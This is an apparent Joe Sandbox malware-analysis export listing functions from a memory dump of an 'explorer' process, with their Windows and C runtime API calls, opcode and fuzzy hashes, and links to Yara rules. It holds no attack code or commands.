                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: e4fd2d0ae6447be26bfcd45c85660d04375e4346e4a2afc1df641b732532d4b5
                                                                                                        • Instruction ID: bd44d3b4823d3b56fda5127230fe1fa2f5ef8a732162eba0f997ac2a6b915173
                                                                                                        • Opcode Fuzzy Hash: e4fd2d0ae6447be26bfcd45c85660d04375e4346e4a2afc1df641b732532d4b5
                                                                                                        • Instruction Fuzzy Hash: BCF01C71641218FBDB21AB50DD0DFDE7FA9EB04756F158164F401E22A0CB788E01DBD4
                                                                                                        Function 007953C2 Relevance: 7.8, APIs: 5, Instructions: 255COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                        • _free.LIBCMT ref: 007956AD
                                                                                                        • _free.LIBCMT ref: 007956C6
                                                                                                        • _free.LIBCMT ref: 00795704
                                                                                                        • _free.LIBCMT ref: 0079570D
                                                                                                        • _free.LIBCMT ref: 00795719
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 3291180501-0
                                                                                                        • Opcode ID: b975fd6b016cc6ec34347a1a9ceddaa310f750087c3944da5f8ae69e9618ddb6
                                                                                                        • Instruction ID: eb5751a17b39da4ea04170beecdadda188f4031e9ea3d72584df6ee4d87f402f
                                                                                                        • Opcode Fuzzy Hash: b975fd6b016cc6ec34347a1a9ceddaa310f750087c3944da5f8ae69e9618ddb6
                                                                                                        • Instruction Fuzzy Hash: DAB16B75A01629DFDF25DF18D888AA9B7B5FF08314F6045ADE84AA7350D738AE90CF40
                                                                                                        Function 00786E00 Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                                                                        • String ID:
                                                                                                        • API String ID: 3354401312-0
                                                                                                        • Opcode ID: 33abd6a09a2b4d49abd08b9150abf87aac3de54f228a45800620ab3d1e6c6cc3
                                                                                                        • Instruction ID: 478e2d9c0edcb1772404e4682e7b67513e7598cfc0ae949404257161688d6e72
                                                                                                        • Opcode Fuzzy Hash: 33abd6a09a2b4d49abd08b9150abf87aac3de54f228a45800620ab3d1e6c6cc3
                                                                                                        • Instruction Fuzzy Hash: AF618170D41209DFDF14EFA4C958BAEBBF4BF04704F2441A9E805A7342DB39AA05CBA1
                                                                                                        Function 0076F280 Relevance: 7.7, APIs: 5, Instructions: 159comCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 0076F317
                                                                                                        • CoCreateInstance.OLE32(007BD064,00000000,00000001,007BD0C4,?), ref: 0076F333
                                                                                                        • CoUninitialize.OLE32 ref: 0076F341
                                                                                                        • CoUninitialize.OLE32 ref: 0076F400
                                                                                                        • CoUninitialize.OLE32 ref: 0076F414
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Uninitialize$CreateInitializeInstance
                                                                                                        • String ID:
                                                                                                        • API String ID: 1968832861-0
                                                                                                        • Opcode ID: ff82224e73b3a68b3b9e65876fe11e1330e347c89afae4061b5aeed143b76b8e
                                                                                                        • Instruction ID: 78489e363db3b3c1f4cc35649e80bc887a386fff033095b1f429623987b8fa3d
                                                                                                        • Opcode Fuzzy Hash: ff82224e73b3a68b3b9e65876fe11e1330e347c89afae4061b5aeed143b76b8e
                                                                                                        • Instruction Fuzzy Hash: 4F51B671A00109DFDB04DF69DC89BEE7BB5EF48314F108128F906E7291D778A944CBA1
                                                                                                        Function 00784C00 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00784C36
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00784C56
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00784C76
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00784D11
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00784D29
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                        • String ID:
                                                                                                        • API String ID: 459529453-0
                                                                                                        • Opcode ID: 0138187148e2fb3f969a3f319d8d887853588a4d721525991dfe5ee1f64e4876
                                                                                                        • Instruction ID: 56a7671f64a77875e7137bf2f318b5d878945519c95ceeb1f9613d4236e39826
                                                                                                        • Opcode Fuzzy Hash: 0138187148e2fb3f969a3f319d8d887853588a4d721525991dfe5ee1f64e4876
                                                                                                        • Instruction Fuzzy Hash: 0441D071A40216DBCB24EF54D845BAEBBB4FF04710F14816EE8066B351EB79AD01CBD5
                                                                                                        Function 007A095D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 007A0975
                                                                                                          • Part of subcall function 00797C06: HeapFree.KERNEL32(00000000,00000000,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?), ref: 00797C1C
                                                                                                          • Part of subcall function 00797C06: GetLastError.KERNEL32(?,?,007A0BFE,?,00000000,?,8B18EC83,?,007A0EA1,?,00000007,?,?,007A1346,?,?), ref: 00797C2E
                                                                                                        • _free.LIBCMT ref: 007A0987
                                                                                                        • _free.LIBCMT ref: 007A0999
                                                                                                        • _free.LIBCMT ref: 007A09AB
                                                                                                        • _free.LIBCMT ref: 007A09BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: e3b71cac2566a7a10d481f685f522786ee2b583ad8ea493d1dd30b360343430a
                                                                                                        • Instruction ID: 23079d1ba913820d215a1279aa64b78a2f7d99a6bf3fecc96f3bcf01b69fe85e
                                                                                                        • Opcode Fuzzy Hash: e3b71cac2566a7a10d481f685f522786ee2b583ad8ea493d1dd30b360343430a
                                                                                                        • Instruction Fuzzy Hash: EFF0FFB2519600EB9E29DF64F985C1B73EDBB427517644D09F048E7611C72DFC808AE4
                                                                                                        Function 0077676D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 315COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RemoveDirectoryA.KERNEL32(00000000), ref: 00776770
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryRemove
                                                                                                        • String ID: 0Ry=$2$246122658369
                                                                                                        • API String ID: 597925465-49898293
                                                                                                        • Opcode ID: b51cc8a8dba0a7071226864ff51814fc25dd1b4d1368043ebfc54b207e326fd0
                                                                                                        • Instruction ID: 26eb05676749f6e1ce76ef7062909aa54f1ca4820b45c677c81345e50b3a13d0
                                                                                                        • Opcode Fuzzy Hash: b51cc8a8dba0a7071226864ff51814fc25dd1b4d1368043ebfc54b207e326fd0
                                                                                                        • Instruction Fuzzy Hash: 94B1F8713105489BEF2DDF28CD8979C7A22EB82344F64C25CE84D9B3DAD73DA6808B55
                                                                                                        Function 0078CDBC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0078CDE1
                                                                                                        • CatchIt.LIBVCRUNTIME ref: 0078CEC7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CatchEncodePointer
                                                                                                        • String ID: MOC$RCC
                                                                                                        • API String ID: 1435073870-2084237596
                                                                                                        • Opcode ID: 095cd29fb7aff4aee2d58c5160fdc7985bde91d657e6777725c6a98398ed7d25
                                                                                                        • Instruction ID: ef3cc65169612a72b7bf9fbdba6a78f985ece8b3808abfa70168ceb6e256abd1
                                                                                                        • Opcode Fuzzy Hash: 095cd29fb7aff4aee2d58c5160fdc7985bde91d657e6777725c6a98398ed7d25
                                                                                                        • Instruction Fuzzy Hash: F0412871940209EFCF16EF98CC85AEEBBB5FF48304F198199FA04A6251D3399960DB61
                                                                                                        Function 00798C15 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 3213747228-0
                                                                                                        • Opcode ID: d725f28c003498a83adba3475cbb9d2ba75eb6362bbb9180f06b7f45438f7c42
                                                                                                        • Instruction ID: 82978acf03d5e63d0b0e43f75dd919ea129f22a97805d0253cf5ed45729239c8
                                                                                                        • Opcode Fuzzy Hash: d725f28c003498a83adba3475cbb9d2ba75eb6362bbb9180f06b7f45438f7c42
                                                                                                        • Instruction Fuzzy Hash: A8B13732A042459FDF15CF28E851BBEBBF5EF56350F2441AAE845AB342DA3C8D41C762
                                                                                                        Function 0078C7BB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AdjustPointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 1740715915-0
                                                                                                        • Opcode ID: 4489bc5aed3415c3a9e2860f93546a47855bf6ebbcf75c5d4fef3120f2163d6a
                                                                                                        • Instruction ID: ad9bf08f29feb1586cfd8ffd00b75bca530bd2286b2896f9fc606d53304c8a54
                                                                                                        • Opcode Fuzzy Hash: 4489bc5aed3415c3a9e2860f93546a47855bf6ebbcf75c5d4fef3120f2163d6a
                                                                                                        • Instruction Fuzzy Hash: B751BE72AC4702EFEB2ABF54D945B6A73A4FF14710F14402EE80297691D73DAC41DBA1
                                                                                                        Function 00769A20 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetVersionExW.KERNEL32(0000011C,?,3F07E9DB,00000000), ref: 00769A99
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00769B00
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00769B07
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProcVersion
                                                                                                        • String ID:
                                                                                                        • API String ID: 3310240892-0
                                                                                                        • Opcode ID: 9d7e25c5f6439608a63c955ff7f738e6ba5206625fd97a3337a246d45ccc199b
                                                                                                        • Instruction ID: dab33346dfb225156fe7e081853cc948208d0dab05f0b1cc7afc97b0fd12498a
                                                                                                        • Opcode Fuzzy Hash: 9d7e25c5f6439608a63c955ff7f738e6ba5206625fd97a3337a246d45ccc199b
                                                                                                        • Instruction Fuzzy Hash: 50512B71D04208DBDB14EB78DD497DDBB79EB45310F504299E90AA72C1EB3D9E80CB91
                                                                                                        Function 007A6C2E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 007A6CFE
                                                                                                        • _free.LIBCMT ref: 007A6D27
                                                                                                        • SetEndOfFile.KERNEL32(00000000,007A348F,00000000,?,?,?,?,?,?,?,?,007A348F,?,00000000), ref: 007A6D59
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,007A348F,?,00000000,?,?,?,?,?), ref: 007A6D75
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFileLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1547350101-0
                                                                                                        • Opcode ID: 9dc92905a490e4100e67d9355b07492e076c2b5f54b87505a66ab4f6bca87b4f
                                                                                                        • Instruction ID: 289c1d45ea2bf0e87337591a2321f563d1f870c8f6776950fdaadb89e6cfdf77
                                                                                                        • Opcode Fuzzy Hash: 9dc92905a490e4100e67d9355b07492e076c2b5f54b87505a66ab4f6bca87b4f
                                                                                                        • Instruction Fuzzy Hash: 6241D272700604DADF15ABB89C0AB9E3775EF863A0F2D0710F554E72A2EA3CD9408771
                                                                                                        Function 00762F00 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 3264154886-0
                                                                                                        • Opcode ID: d191e9b176bfe1972c21ef33569816b8c0fd28f58e9011fe268dab5ded11e1ec
                                                                                                        • Instruction ID: 63f15b104700c432b5409369991225306d9d70e7eb6e2b05916986ecda3a369b
                                                                                                        • Opcode Fuzzy Hash: d191e9b176bfe1972c21ef33569816b8c0fd28f58e9011fe268dab5ded11e1ec
                                                                                                        • Instruction Fuzzy Hash: 6A41DFB1A01605DFCB11EF64C844B9AB7E8FF18320F144529E81AC7781EB39EA05CBD1
                                                                                                        Function 0079EA55 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0078E64B: _free.LIBCMT ref: 0078E659
                                                                                                          • Part of subcall function 0079DEFF: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,00797B47,0000FDE9,8B18EC83,?,?,?,007978C0,0000FDE9,00000000,?), ref: 0079DFAB
                                                                                                        • GetLastError.KERNEL32 ref: 0079EABD
                                                                                                        • __dosmaperr.LIBCMT ref: 0079EAC4
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0079EB03
                                                                                                        • __dosmaperr.LIBCMT ref: 0079EB0A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 167067550-0
                                                                                                        • Opcode ID: c89133209f3e2d45ed95b386c4b29fbd7958e95cd134d081907af5303038fe60
                                                                                                        • Instruction ID: ea6190b867cd25130f5403e00e7f97f49de1d7791a2a12b0d1ff0aacad8c5d71
                                                                                                        • Opcode Fuzzy Hash: c89133209f3e2d45ed95b386c4b29fbd7958e95cd134d081907af5303038fe60
                                                                                                        • Instruction Fuzzy Hash: 6521B3B1600205EFDF20EF65AC85D7BB7ADFF113647108628F91997261E738EC4087A0
                                                                                                        Function 00796820 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                        • _free.LIBCMT ref: 00796882
                                                                                                        • _free.LIBCMT ref: 007968B8
                                                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2283115069-0
                                                                                                        • Opcode ID: 4bd6d526b4d1ab3cfad8e75d4fc8b07d8d7986ce7b6d109a9dddf4a1e93a2df5
                                                                                                        • Instruction ID: 936ceb1daad75504602ea5217b468a87a7f454ddcade68d63b79e03163376fc8
                                                                                                        • Opcode Fuzzy Hash: 4bd6d526b4d1ab3cfad8e75d4fc8b07d8d7986ce7b6d109a9dddf4a1e93a2df5
                                                                                                        • Instruction Fuzzy Hash: 7A11E5B2204600AFDF5137B4BCC9E2F279EEBC17767240339F120961E2DE6E8C468225
                                                                                                        Function 00787D58 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
